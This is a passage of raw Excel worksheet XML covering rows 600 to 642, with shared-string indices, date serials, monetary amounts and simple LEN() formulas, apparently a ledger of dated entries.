      </c>
      <c r="G600" s="1">
        <v>43913</v>
      </c>
      <c r="H600">
        <v>3000</v>
      </c>
      <c r="I600" t="s">
        <v>9550</v>
      </c>
      <c r="J600" t="s">
        <v>9555</v>
      </c>
      <c r="K600">
        <f>LEN(I600)</f>
        <v>18</v>
      </c>
      <c r="L600">
        <f>LEN(J600)</f>
        <v>32</v>
      </c>
    </row>
    <row r="601" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A601">
        <v>20523</v>
      </c>
      <c r="B601">
        <v>2777</v>
      </c>
      <c r="C601" t="s">
        <v>789</v>
      </c>
      <c r="D601" t="s">
        <v>10768</v>
      </c>
      <c r="E601">
        <v>12</v>
      </c>
      <c r="F601" t="s">
        <v>9437</v>
      </c>
      <c r="G601" s="1">
        <v>43952</v>
      </c>
      <c r="H601">
        <v>30000</v>
      </c>
      <c r="I601" t="s">
        <v>9550</v>
      </c>
      <c r="J601" t="s">
        <v>9555</v>
      </c>
      <c r="K601">
        <f>LEN(I601)</f>
        <v>18</v>
      </c>
      <c r="L601">
        <f>LEN(J601)</f>
        <v>32</v>
      </c>
    </row>
    <row r="602" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A602">
        <v>20525</v>
      </c>
      <c r="B602">
        <v>2777</v>
      </c>
      <c r="C602" t="s">
        <v>789</v>
      </c>
      <c r="D602" t="s">
        <v>10768</v>
      </c>
      <c r="E602">
        <v>12</v>
      </c>
      <c r="F602" t="s">
        <v>10071</v>
      </c>
      <c r="G602" s="1">
        <v>43952</v>
      </c>
      <c r="H602">
        <v>2000</v>
      </c>
      <c r="I602" t="s">
        <v>9550</v>
      </c>
      <c r="J602" t="s">
        <v>9555</v>
      </c>
      <c r="K602">
        <f>LEN(I602)</f>
        <v>18</v>
      </c>
      <c r="L602">
        <f>LEN(J602)</f>
        <v>32</v>
      </c>
    </row>
    <row r="603" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A603">
        <v>21130</v>
      </c>
      <c r="B603">
        <v>2016</v>
      </c>
      <c r="C603" t="s">
        <v>5283</v>
      </c>
      <c r="D603" t="s">
        <v>9488</v>
      </c>
      <c r="E603">
        <v>14</v>
      </c>
      <c r="F603" t="s">
        <v>9595</v>
      </c>
      <c r="G603" s="1">
        <v>44123</v>
      </c>
      <c r="H603">
        <v>200000</v>
      </c>
      <c r="I603" t="s">
        <v>11160</v>
      </c>
      <c r="J603" t="s">
        <v>9555</v>
      </c>
      <c r="K603">
        <f>LEN(I603)</f>
        <v>18</v>
      </c>
      <c r="L603">
        <f>LEN(J603)</f>
        <v>32</v>
      </c>
    </row>
    <row r="604" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A604">
        <v>21131</v>
      </c>
      <c r="B604">
        <v>2016</v>
      </c>
      <c r="C604" t="s">
        <v>5283</v>
      </c>
      <c r="D604" t="s">
        <v>9488</v>
      </c>
      <c r="E604">
        <v>14</v>
      </c>
      <c r="F604" t="s">
        <v>9722</v>
      </c>
      <c r="G604" s="1">
        <v>44123</v>
      </c>
      <c r="H604">
        <v>200000</v>
      </c>
      <c r="I604" t="s">
        <v>11160</v>
      </c>
      <c r="J604" t="s">
        <v>9555</v>
      </c>
      <c r="K604">
        <f>LEN(I604)</f>
        <v>18</v>
      </c>
      <c r="L604">
        <f>LEN(J604)</f>
        <v>32</v>
      </c>
    </row>
    <row r="605" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A605">
        <v>20571</v>
      </c>
      <c r="B605">
        <v>2769</v>
      </c>
      <c r="C605" t="s">
        <v>6962</v>
      </c>
      <c r="D605" t="s">
        <v>10816</v>
      </c>
      <c r="E605">
        <v>25</v>
      </c>
      <c r="F605" t="s">
        <v>609</v>
      </c>
      <c r="G605" s="1">
        <v>43959</v>
      </c>
      <c r="H605">
        <v>0</v>
      </c>
      <c r="I605" t="s">
        <v>9536</v>
      </c>
      <c r="J605" t="s">
        <v>9555</v>
      </c>
      <c r="K605">
        <f>LEN(I605)</f>
        <v>13</v>
      </c>
      <c r="L605">
        <f>LEN(J605)</f>
        <v>32</v>
      </c>
    </row>
    <row r="606" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A606">
        <v>20489</v>
      </c>
      <c r="B606">
        <v>756</v>
      </c>
      <c r="C606" t="s">
        <v>962</v>
      </c>
      <c r="D606" t="s">
        <v>10752</v>
      </c>
      <c r="E606">
        <v>5</v>
      </c>
      <c r="F606" t="s">
        <v>10753</v>
      </c>
      <c r="G606" s="1">
        <v>43949</v>
      </c>
      <c r="H606">
        <v>9000</v>
      </c>
      <c r="I606" t="s">
        <v>9638</v>
      </c>
      <c r="J606" t="s">
        <v>10754</v>
      </c>
      <c r="K606">
        <f>LEN(I606)</f>
        <v>10</v>
      </c>
      <c r="L606">
        <f>LEN(J606)</f>
        <v>32</v>
      </c>
    </row>
    <row r="607" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A607">
        <v>19592</v>
      </c>
      <c r="B607">
        <v>655</v>
      </c>
      <c r="C607" t="s">
        <v>439</v>
      </c>
      <c r="D607" t="s">
        <v>10120</v>
      </c>
      <c r="E607">
        <v>2</v>
      </c>
      <c r="F607" t="s">
        <v>10121</v>
      </c>
      <c r="G607" s="1">
        <v>43885</v>
      </c>
      <c r="H607">
        <v>80000</v>
      </c>
      <c r="J607" t="s">
        <v>9555</v>
      </c>
      <c r="K607">
        <f>LEN(I607)</f>
        <v>0</v>
      </c>
      <c r="L607">
        <f>LEN(J607)</f>
        <v>32</v>
      </c>
    </row>
    <row r="608" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A608">
        <v>19593</v>
      </c>
      <c r="B608">
        <v>655</v>
      </c>
      <c r="C608" t="s">
        <v>439</v>
      </c>
      <c r="D608" t="s">
        <v>10120</v>
      </c>
      <c r="E608">
        <v>2</v>
      </c>
      <c r="F608" t="s">
        <v>10122</v>
      </c>
      <c r="G608" s="1">
        <v>43885</v>
      </c>
      <c r="H608">
        <v>100000</v>
      </c>
      <c r="J608" t="s">
        <v>9555</v>
      </c>
      <c r="K608">
        <f>LEN(I608)</f>
        <v>0</v>
      </c>
      <c r="L608">
        <f>LEN(J608)</f>
        <v>32</v>
      </c>
    </row>
    <row r="609" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A609">
        <v>19704</v>
      </c>
      <c r="B609">
        <v>2557</v>
      </c>
      <c r="C609" t="s">
        <v>5283</v>
      </c>
      <c r="D609" t="s">
        <v>10187</v>
      </c>
      <c r="E609">
        <v>16</v>
      </c>
      <c r="F609" t="s">
        <v>3076</v>
      </c>
      <c r="G609" s="1">
        <v>43864</v>
      </c>
      <c r="H609">
        <v>125000</v>
      </c>
      <c r="J609" t="s">
        <v>9555</v>
      </c>
      <c r="K609">
        <f>LEN(I609)</f>
        <v>0</v>
      </c>
      <c r="L609">
        <f>LEN(J609)</f>
        <v>32</v>
      </c>
    </row>
    <row r="610" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A610">
        <v>19705</v>
      </c>
      <c r="B610">
        <v>2557</v>
      </c>
      <c r="C610" t="s">
        <v>5283</v>
      </c>
      <c r="D610" t="s">
        <v>10187</v>
      </c>
      <c r="E610">
        <v>16</v>
      </c>
      <c r="F610" t="s">
        <v>10188</v>
      </c>
      <c r="G610" s="1">
        <v>43864</v>
      </c>
      <c r="H610">
        <v>100000</v>
      </c>
      <c r="J610" t="s">
        <v>9555</v>
      </c>
      <c r="K610">
        <f>LEN(I610)</f>
        <v>0</v>
      </c>
      <c r="L610">
        <f>LEN(J610)</f>
        <v>32</v>
      </c>
    </row>
    <row r="611" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A611">
        <v>19706</v>
      </c>
      <c r="B611">
        <v>2557</v>
      </c>
      <c r="C611" t="s">
        <v>5283</v>
      </c>
      <c r="D611" t="s">
        <v>10187</v>
      </c>
      <c r="E611">
        <v>16</v>
      </c>
      <c r="F611" t="s">
        <v>9470</v>
      </c>
      <c r="G611" s="1">
        <v>43864</v>
      </c>
      <c r="H611">
        <v>70000</v>
      </c>
      <c r="J611" t="s">
        <v>9555</v>
      </c>
      <c r="K611">
        <f>LEN(I611)</f>
        <v>0</v>
      </c>
      <c r="L611">
        <f>LEN(J611)</f>
        <v>32</v>
      </c>
    </row>
    <row r="612" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A612">
        <v>19707</v>
      </c>
      <c r="B612">
        <v>2557</v>
      </c>
      <c r="C612" t="s">
        <v>5283</v>
      </c>
      <c r="D612" t="s">
        <v>10187</v>
      </c>
      <c r="E612">
        <v>16</v>
      </c>
      <c r="F612" t="s">
        <v>10189</v>
      </c>
      <c r="G612" s="1">
        <v>43864</v>
      </c>
      <c r="H612">
        <v>80000</v>
      </c>
      <c r="J612" t="s">
        <v>9555</v>
      </c>
      <c r="K612">
        <f>LEN(I612)</f>
        <v>0</v>
      </c>
      <c r="L612">
        <f>LEN(J612)</f>
        <v>32</v>
      </c>
    </row>
    <row r="613" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A613">
        <v>20184</v>
      </c>
      <c r="B613">
        <v>367</v>
      </c>
      <c r="C613" t="s">
        <v>744</v>
      </c>
      <c r="D613" t="s">
        <v>10528</v>
      </c>
      <c r="E613">
        <v>14</v>
      </c>
      <c r="F613" t="s">
        <v>10530</v>
      </c>
      <c r="G613" s="1">
        <v>44217</v>
      </c>
      <c r="H613">
        <v>2700</v>
      </c>
      <c r="J613" t="s">
        <v>9555</v>
      </c>
      <c r="K613">
        <f>LEN(I613)</f>
        <v>0</v>
      </c>
      <c r="L613">
        <f>LEN(J613)</f>
        <v>32</v>
      </c>
    </row>
    <row r="614" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A614">
        <v>20275</v>
      </c>
      <c r="B614">
        <v>873</v>
      </c>
      <c r="C614" t="s">
        <v>2904</v>
      </c>
      <c r="D614" t="s">
        <v>10592</v>
      </c>
      <c r="E614">
        <v>13</v>
      </c>
      <c r="F614" t="s">
        <v>10593</v>
      </c>
      <c r="G614" s="1">
        <v>44056</v>
      </c>
      <c r="H614">
        <v>1000</v>
      </c>
      <c r="J614" t="s">
        <v>9555</v>
      </c>
      <c r="K614">
        <f>LEN(I614)</f>
        <v>0</v>
      </c>
      <c r="L614">
        <f>LEN(J614)</f>
        <v>32</v>
      </c>
    </row>
    <row r="615" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A615">
        <v>20327</v>
      </c>
      <c r="B615">
        <v>830</v>
      </c>
      <c r="C615" t="s">
        <v>16311</v>
      </c>
      <c r="D615" t="s">
        <v>16312</v>
      </c>
      <c r="E615">
        <v>14</v>
      </c>
      <c r="F615" t="s">
        <v>1746</v>
      </c>
      <c r="G615" s="1">
        <v>44046</v>
      </c>
      <c r="H615">
        <v>1111887.05</v>
      </c>
      <c r="J615" t="s">
        <v>10630</v>
      </c>
      <c r="K615">
        <f>LEN(I615)</f>
        <v>0</v>
      </c>
      <c r="L615">
        <f>LEN(J615)</f>
        <v>32</v>
      </c>
    </row>
    <row r="616" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A616">
        <v>20726</v>
      </c>
      <c r="B616">
        <v>794</v>
      </c>
      <c r="C616" t="s">
        <v>1204</v>
      </c>
      <c r="D616" t="s">
        <v>10938</v>
      </c>
      <c r="E616">
        <v>32</v>
      </c>
      <c r="F616" t="s">
        <v>1207</v>
      </c>
      <c r="G616" s="1">
        <v>43949</v>
      </c>
      <c r="H616">
        <v>82740</v>
      </c>
      <c r="J616" t="s">
        <v>10630</v>
      </c>
      <c r="K616">
        <f>LEN(I616)</f>
        <v>0</v>
      </c>
      <c r="L616">
        <f>LEN(J616)</f>
        <v>32</v>
      </c>
    </row>
    <row r="617" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A617">
        <v>21128</v>
      </c>
      <c r="B617">
        <v>2016</v>
      </c>
      <c r="C617" t="s">
        <v>5283</v>
      </c>
      <c r="D617" t="s">
        <v>9488</v>
      </c>
      <c r="E617">
        <v>14</v>
      </c>
      <c r="F617" t="s">
        <v>9435</v>
      </c>
      <c r="G617" s="1">
        <v>44123</v>
      </c>
      <c r="H617">
        <v>400000</v>
      </c>
      <c r="J617" t="s">
        <v>9555</v>
      </c>
      <c r="K617">
        <f>LEN(I617)</f>
        <v>0</v>
      </c>
      <c r="L617">
        <f>LEN(J617)</f>
        <v>32</v>
      </c>
    </row>
    <row r="618" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A618">
        <v>19334</v>
      </c>
      <c r="B618">
        <v>1823</v>
      </c>
      <c r="C618" t="s">
        <v>4956</v>
      </c>
      <c r="D618" t="s">
        <v>9927</v>
      </c>
      <c r="E618">
        <v>26</v>
      </c>
      <c r="F618" t="s">
        <v>9929</v>
      </c>
      <c r="G618" s="1">
        <v>43860</v>
      </c>
      <c r="H618">
        <v>120000</v>
      </c>
      <c r="I618" t="s">
        <v>9522</v>
      </c>
      <c r="J618" t="s">
        <v>9832</v>
      </c>
      <c r="K618">
        <f>LEN(I618)</f>
        <v>13</v>
      </c>
      <c r="L618">
        <f>LEN(J618)</f>
        <v>31</v>
      </c>
    </row>
    <row r="619" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A619">
        <v>18099</v>
      </c>
      <c r="B619">
        <v>1691</v>
      </c>
      <c r="C619" t="s">
        <v>2588</v>
      </c>
      <c r="D619" t="s">
        <v>9830</v>
      </c>
      <c r="E619">
        <v>26</v>
      </c>
      <c r="F619" t="s">
        <v>9831</v>
      </c>
      <c r="G619" s="1">
        <v>43858</v>
      </c>
      <c r="H619">
        <v>324</v>
      </c>
      <c r="J619" t="s">
        <v>9832</v>
      </c>
      <c r="K619">
        <f>LEN(I619)</f>
        <v>0</v>
      </c>
      <c r="L619">
        <f>LEN(J619)</f>
        <v>31</v>
      </c>
    </row>
    <row r="620" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A620">
        <v>18191</v>
      </c>
      <c r="B620">
        <v>1691</v>
      </c>
      <c r="C620" t="s">
        <v>2588</v>
      </c>
      <c r="D620" t="s">
        <v>9830</v>
      </c>
      <c r="E620">
        <v>26</v>
      </c>
      <c r="F620" t="s">
        <v>9834</v>
      </c>
      <c r="G620" s="1">
        <v>43858</v>
      </c>
      <c r="H620">
        <v>324</v>
      </c>
      <c r="J620" t="s">
        <v>9832</v>
      </c>
      <c r="K620">
        <f>LEN(I620)</f>
        <v>0</v>
      </c>
      <c r="L620">
        <f>LEN(J620)</f>
        <v>31</v>
      </c>
    </row>
    <row r="621" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A621">
        <v>19330</v>
      </c>
      <c r="B621">
        <v>1823</v>
      </c>
      <c r="C621" t="s">
        <v>4956</v>
      </c>
      <c r="D621" t="s">
        <v>9927</v>
      </c>
      <c r="E621">
        <v>26</v>
      </c>
      <c r="F621" t="s">
        <v>9928</v>
      </c>
      <c r="G621" s="1">
        <v>43860</v>
      </c>
      <c r="H621">
        <v>120000</v>
      </c>
      <c r="J621" t="s">
        <v>9832</v>
      </c>
      <c r="K621">
        <f>LEN(I621)</f>
        <v>0</v>
      </c>
      <c r="L621">
        <f>LEN(J621)</f>
        <v>31</v>
      </c>
    </row>
    <row r="622" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A622">
        <v>19331</v>
      </c>
      <c r="B622">
        <v>1823</v>
      </c>
      <c r="C622" t="s">
        <v>4956</v>
      </c>
      <c r="D622" t="s">
        <v>9927</v>
      </c>
      <c r="E622">
        <v>26</v>
      </c>
      <c r="F622" t="s">
        <v>9533</v>
      </c>
      <c r="G622" s="1">
        <v>43860</v>
      </c>
      <c r="H622">
        <v>120000</v>
      </c>
      <c r="J622" t="s">
        <v>9832</v>
      </c>
      <c r="K622">
        <f>LEN(I622)</f>
        <v>0</v>
      </c>
      <c r="L622">
        <f>LEN(J622)</f>
        <v>31</v>
      </c>
    </row>
    <row r="623" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A623">
        <v>19332</v>
      </c>
      <c r="B623">
        <v>1823</v>
      </c>
      <c r="C623" t="s">
        <v>4956</v>
      </c>
      <c r="D623" t="s">
        <v>9927</v>
      </c>
      <c r="E623">
        <v>26</v>
      </c>
      <c r="F623" t="s">
        <v>9595</v>
      </c>
      <c r="G623" s="1">
        <v>43860</v>
      </c>
      <c r="H623">
        <v>120000</v>
      </c>
      <c r="J623" t="s">
        <v>9832</v>
      </c>
      <c r="K623">
        <f>LEN(I623)</f>
        <v>0</v>
      </c>
      <c r="L623">
        <f>LEN(J623)</f>
        <v>31</v>
      </c>
    </row>
    <row r="624" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A624">
        <v>19333</v>
      </c>
      <c r="B624">
        <v>1823</v>
      </c>
      <c r="C624" t="s">
        <v>4956</v>
      </c>
      <c r="D624" t="s">
        <v>9927</v>
      </c>
      <c r="E624">
        <v>26</v>
      </c>
      <c r="F624" t="s">
        <v>9681</v>
      </c>
      <c r="G624" s="1">
        <v>43860</v>
      </c>
      <c r="H624">
        <v>120000</v>
      </c>
      <c r="J624" t="s">
        <v>9832</v>
      </c>
      <c r="K624">
        <f>LEN(I624)</f>
        <v>0</v>
      </c>
      <c r="L624">
        <f>LEN(J624)</f>
        <v>31</v>
      </c>
    </row>
    <row r="625" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A625">
        <v>20301</v>
      </c>
      <c r="B625">
        <v>825</v>
      </c>
      <c r="C625" t="s">
        <v>719</v>
      </c>
      <c r="D625" t="s">
        <v>9924</v>
      </c>
      <c r="E625">
        <v>11</v>
      </c>
      <c r="F625" t="s">
        <v>673</v>
      </c>
      <c r="G625" s="1">
        <v>43944</v>
      </c>
      <c r="H625">
        <v>3963400</v>
      </c>
      <c r="J625" t="s">
        <v>9832</v>
      </c>
      <c r="K625">
        <f>LEN(I625)</f>
        <v>0</v>
      </c>
      <c r="L625">
        <f>LEN(J625)</f>
        <v>31</v>
      </c>
    </row>
    <row r="626" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A626">
        <v>20302</v>
      </c>
      <c r="B626">
        <v>825</v>
      </c>
      <c r="C626" t="s">
        <v>719</v>
      </c>
      <c r="D626" t="s">
        <v>9924</v>
      </c>
      <c r="E626">
        <v>11</v>
      </c>
      <c r="F626" t="s">
        <v>9441</v>
      </c>
      <c r="G626" s="1">
        <v>43944</v>
      </c>
      <c r="H626">
        <v>1698600</v>
      </c>
      <c r="J626" t="s">
        <v>9832</v>
      </c>
      <c r="K626">
        <f>LEN(I626)</f>
        <v>0</v>
      </c>
      <c r="L626">
        <f>LEN(J626)</f>
        <v>31</v>
      </c>
    </row>
    <row r="627" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A627">
        <v>20757</v>
      </c>
      <c r="B627">
        <v>518</v>
      </c>
      <c r="C627" t="s">
        <v>16313</v>
      </c>
      <c r="D627" t="s">
        <v>16314</v>
      </c>
      <c r="E627">
        <v>16</v>
      </c>
      <c r="F627" t="s">
        <v>10956</v>
      </c>
      <c r="G627" s="1">
        <v>44095</v>
      </c>
      <c r="H627" s="4">
        <v>720000</v>
      </c>
      <c r="J627" t="s">
        <v>10957</v>
      </c>
      <c r="K627">
        <f>LEN(I627)</f>
        <v>0</v>
      </c>
      <c r="L627">
        <f>LEN(J627)</f>
        <v>31</v>
      </c>
    </row>
    <row r="628" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A628">
        <v>20761</v>
      </c>
      <c r="B628">
        <v>518</v>
      </c>
      <c r="C628" t="s">
        <v>16313</v>
      </c>
      <c r="D628" t="s">
        <v>16314</v>
      </c>
      <c r="E628">
        <v>16</v>
      </c>
      <c r="F628" t="s">
        <v>10960</v>
      </c>
      <c r="G628" s="1">
        <v>44095</v>
      </c>
      <c r="H628" s="4">
        <v>720000</v>
      </c>
      <c r="J628" t="s">
        <v>10957</v>
      </c>
      <c r="K628">
        <f>LEN(I628)</f>
        <v>0</v>
      </c>
      <c r="L628">
        <f>LEN(J628)</f>
        <v>31</v>
      </c>
    </row>
    <row r="629" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A629">
        <v>20763</v>
      </c>
      <c r="B629">
        <v>518</v>
      </c>
      <c r="C629" t="s">
        <v>16313</v>
      </c>
      <c r="D629" t="s">
        <v>16314</v>
      </c>
      <c r="E629">
        <v>16</v>
      </c>
      <c r="F629" t="s">
        <v>9964</v>
      </c>
      <c r="G629" s="1">
        <v>44095</v>
      </c>
      <c r="H629" s="4">
        <v>720000</v>
      </c>
      <c r="J629" t="s">
        <v>10957</v>
      </c>
      <c r="K629">
        <f>LEN(I629)</f>
        <v>0</v>
      </c>
      <c r="L629">
        <f>LEN(J629)</f>
        <v>31</v>
      </c>
    </row>
    <row r="630" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A630">
        <v>17169</v>
      </c>
      <c r="B630">
        <v>2267</v>
      </c>
      <c r="C630" t="s">
        <v>6309</v>
      </c>
      <c r="D630" t="s">
        <v>9707</v>
      </c>
      <c r="E630">
        <v>18</v>
      </c>
      <c r="F630" t="s">
        <v>4686</v>
      </c>
      <c r="G630" s="1">
        <v>43901</v>
      </c>
      <c r="H630">
        <v>10000</v>
      </c>
      <c r="I630" t="s">
        <v>9708</v>
      </c>
      <c r="J630" t="s">
        <v>9709</v>
      </c>
      <c r="K630">
        <f>LEN(I630)</f>
        <v>91</v>
      </c>
      <c r="L630">
        <f>LEN(J630)</f>
        <v>30</v>
      </c>
    </row>
    <row r="631" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A631">
        <v>19906</v>
      </c>
      <c r="B631">
        <v>2340</v>
      </c>
      <c r="C631" t="s">
        <v>5166</v>
      </c>
      <c r="D631" t="s">
        <v>10318</v>
      </c>
      <c r="E631">
        <v>5</v>
      </c>
      <c r="F631" t="s">
        <v>10319</v>
      </c>
      <c r="G631" s="1">
        <v>43881</v>
      </c>
      <c r="H631">
        <v>300000</v>
      </c>
      <c r="I631" t="s">
        <v>9899</v>
      </c>
      <c r="J631" t="s">
        <v>10320</v>
      </c>
      <c r="K631">
        <f>LEN(I631)</f>
        <v>33</v>
      </c>
      <c r="L631">
        <f>LEN(J631)</f>
        <v>30</v>
      </c>
    </row>
    <row r="632" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A632">
        <v>20377</v>
      </c>
      <c r="B632">
        <v>1248</v>
      </c>
      <c r="C632" t="s">
        <v>2951</v>
      </c>
      <c r="D632" t="s">
        <v>10666</v>
      </c>
      <c r="E632">
        <v>11</v>
      </c>
      <c r="F632" t="s">
        <v>9458</v>
      </c>
      <c r="G632" s="1">
        <v>44298</v>
      </c>
      <c r="H632">
        <v>5000</v>
      </c>
      <c r="J632" t="s">
        <v>10668</v>
      </c>
      <c r="K632">
        <f>LEN(I632)</f>
        <v>0</v>
      </c>
      <c r="L632">
        <f>LEN(J632)</f>
        <v>30</v>
      </c>
    </row>
    <row r="633" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A633">
        <v>20723</v>
      </c>
      <c r="B633">
        <v>2332</v>
      </c>
      <c r="C633" t="s">
        <v>5974</v>
      </c>
      <c r="D633" t="s">
        <v>9594</v>
      </c>
      <c r="E633">
        <v>13</v>
      </c>
      <c r="F633" t="s">
        <v>10933</v>
      </c>
      <c r="G633" s="1">
        <v>44000</v>
      </c>
      <c r="H633">
        <v>50000</v>
      </c>
      <c r="I633" t="s">
        <v>10853</v>
      </c>
      <c r="J633" t="s">
        <v>10934</v>
      </c>
      <c r="K633">
        <f>LEN(I633)</f>
        <v>129</v>
      </c>
      <c r="L633">
        <f>LEN(J633)</f>
        <v>29</v>
      </c>
    </row>
    <row r="634" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A634">
        <v>20987</v>
      </c>
      <c r="B634">
        <v>2686</v>
      </c>
      <c r="C634" t="s">
        <v>6084</v>
      </c>
      <c r="D634" t="s">
        <v>11080</v>
      </c>
      <c r="E634">
        <v>19</v>
      </c>
      <c r="F634" t="s">
        <v>3462</v>
      </c>
      <c r="G634" s="1">
        <v>43984</v>
      </c>
      <c r="H634">
        <v>22000</v>
      </c>
      <c r="I634" t="s">
        <v>11091</v>
      </c>
      <c r="J634" t="s">
        <v>11082</v>
      </c>
      <c r="K634">
        <f>LEN(I634)</f>
        <v>28</v>
      </c>
      <c r="L634">
        <f>LEN(J634)</f>
        <v>29</v>
      </c>
    </row>
    <row r="635" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A635">
        <v>19830</v>
      </c>
      <c r="B635">
        <v>2620</v>
      </c>
      <c r="C635" t="s">
        <v>16295</v>
      </c>
      <c r="D635" t="s">
        <v>16296</v>
      </c>
      <c r="E635">
        <v>2</v>
      </c>
      <c r="F635" t="s">
        <v>9466</v>
      </c>
      <c r="G635" s="1">
        <v>43942</v>
      </c>
      <c r="H635" s="4">
        <v>150000</v>
      </c>
      <c r="I635" t="s">
        <v>9550</v>
      </c>
      <c r="J635" t="s">
        <v>10272</v>
      </c>
      <c r="K635">
        <f>LEN(I635)</f>
        <v>18</v>
      </c>
      <c r="L635">
        <f>LEN(J635)</f>
        <v>29</v>
      </c>
    </row>
    <row r="636" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A636">
        <v>20398</v>
      </c>
      <c r="B636">
        <v>2620</v>
      </c>
      <c r="C636" t="s">
        <v>16295</v>
      </c>
      <c r="D636" t="s">
        <v>16296</v>
      </c>
      <c r="E636">
        <v>2</v>
      </c>
      <c r="F636" t="s">
        <v>7211</v>
      </c>
      <c r="G636" s="1">
        <v>43942</v>
      </c>
      <c r="H636" s="4">
        <v>30000</v>
      </c>
      <c r="I636" t="s">
        <v>9550</v>
      </c>
      <c r="J636" t="s">
        <v>10272</v>
      </c>
      <c r="K636">
        <f>LEN(I636)</f>
        <v>18</v>
      </c>
      <c r="L636">
        <f>LEN(J636)</f>
        <v>29</v>
      </c>
    </row>
    <row r="637" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A637">
        <v>20402</v>
      </c>
      <c r="B637">
        <v>2620</v>
      </c>
      <c r="C637" t="s">
        <v>16295</v>
      </c>
      <c r="D637" t="s">
        <v>16296</v>
      </c>
      <c r="E637">
        <v>2</v>
      </c>
      <c r="F637" t="s">
        <v>9892</v>
      </c>
      <c r="G637" s="1">
        <v>43942</v>
      </c>
      <c r="H637" s="4">
        <v>20000</v>
      </c>
      <c r="I637" t="s">
        <v>9550</v>
      </c>
      <c r="J637" t="s">
        <v>10272</v>
      </c>
      <c r="K637">
        <f>LEN(I637)</f>
        <v>18</v>
      </c>
      <c r="L637">
        <f>LEN(J637)</f>
        <v>29</v>
      </c>
    </row>
    <row r="638" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A638">
        <v>20968</v>
      </c>
      <c r="B638">
        <v>2686</v>
      </c>
      <c r="C638" t="s">
        <v>6084</v>
      </c>
      <c r="D638" t="s">
        <v>11080</v>
      </c>
      <c r="E638">
        <v>19</v>
      </c>
      <c r="F638" t="s">
        <v>11081</v>
      </c>
      <c r="G638" s="1">
        <v>43984</v>
      </c>
      <c r="H638">
        <v>22000</v>
      </c>
      <c r="I638" t="s">
        <v>9522</v>
      </c>
      <c r="J638" t="s">
        <v>11082</v>
      </c>
      <c r="K638">
        <f>LEN(I638)</f>
        <v>13</v>
      </c>
      <c r="L638">
        <f>LEN(J638)</f>
        <v>29</v>
      </c>
    </row>
    <row r="639" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A639">
        <v>19274</v>
      </c>
      <c r="B639">
        <v>1989</v>
      </c>
      <c r="C639" t="s">
        <v>4852</v>
      </c>
      <c r="D639" t="s">
        <v>9895</v>
      </c>
      <c r="E639">
        <v>16</v>
      </c>
      <c r="F639" t="s">
        <v>364</v>
      </c>
      <c r="G639" s="1">
        <v>43857</v>
      </c>
      <c r="H639">
        <v>300000</v>
      </c>
      <c r="J639" t="s">
        <v>9896</v>
      </c>
      <c r="K639">
        <f>LEN(I639)</f>
        <v>0</v>
      </c>
      <c r="L639">
        <f>LEN(J639)</f>
        <v>29</v>
      </c>
    </row>
    <row r="640" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A640">
        <v>19636</v>
      </c>
      <c r="B640">
        <v>722</v>
      </c>
      <c r="C640" t="s">
        <v>344</v>
      </c>
      <c r="D640" t="s">
        <v>10150</v>
      </c>
      <c r="E640">
        <v>10</v>
      </c>
      <c r="F640" t="s">
        <v>9441</v>
      </c>
      <c r="G640" s="1">
        <v>43871</v>
      </c>
      <c r="H640">
        <v>300000</v>
      </c>
      <c r="J640" t="s">
        <v>10151</v>
      </c>
      <c r="K640">
        <f>LEN(I640)</f>
        <v>0</v>
      </c>
      <c r="L640">
        <f>LEN(J640)</f>
        <v>29</v>
      </c>
    </row>
    <row r="641" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A641">
        <v>19638</v>
      </c>
      <c r="B641">
        <v>722</v>
      </c>
      <c r="C641" t="s">
        <v>344</v>
      </c>
      <c r="D641" t="s">
        <v>10150</v>
      </c>
      <c r="E641">
        <v>10</v>
      </c>
      <c r="F641" t="s">
        <v>673</v>
      </c>
      <c r="G641" s="1">
        <v>43871</v>
      </c>
      <c r="H641">
        <v>400000</v>
      </c>
      <c r="J641" t="s">
        <v>10151</v>
      </c>
      <c r="K641">
        <f>LEN(I641)</f>
        <v>0</v>
      </c>
      <c r="L641">
        <f>LEN(J641)</f>
        <v>29</v>
      </c>
    </row>
    <row r="642" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A642">
        <v>20561</v>
      </c>
      <c r="B642">
        <v>2695</v>
      </c>
      <c r="C642" t="s">
        <v>5948</v>
      </c>
      <c r="D642" t="s">
        <v>10809</v>
      </c>
      <c r="E642">
        <v>11</v>
      </c>
      <c r="F642" t="s">
        <v>9458</v>
      </c>
      <c r="G642" s="1">
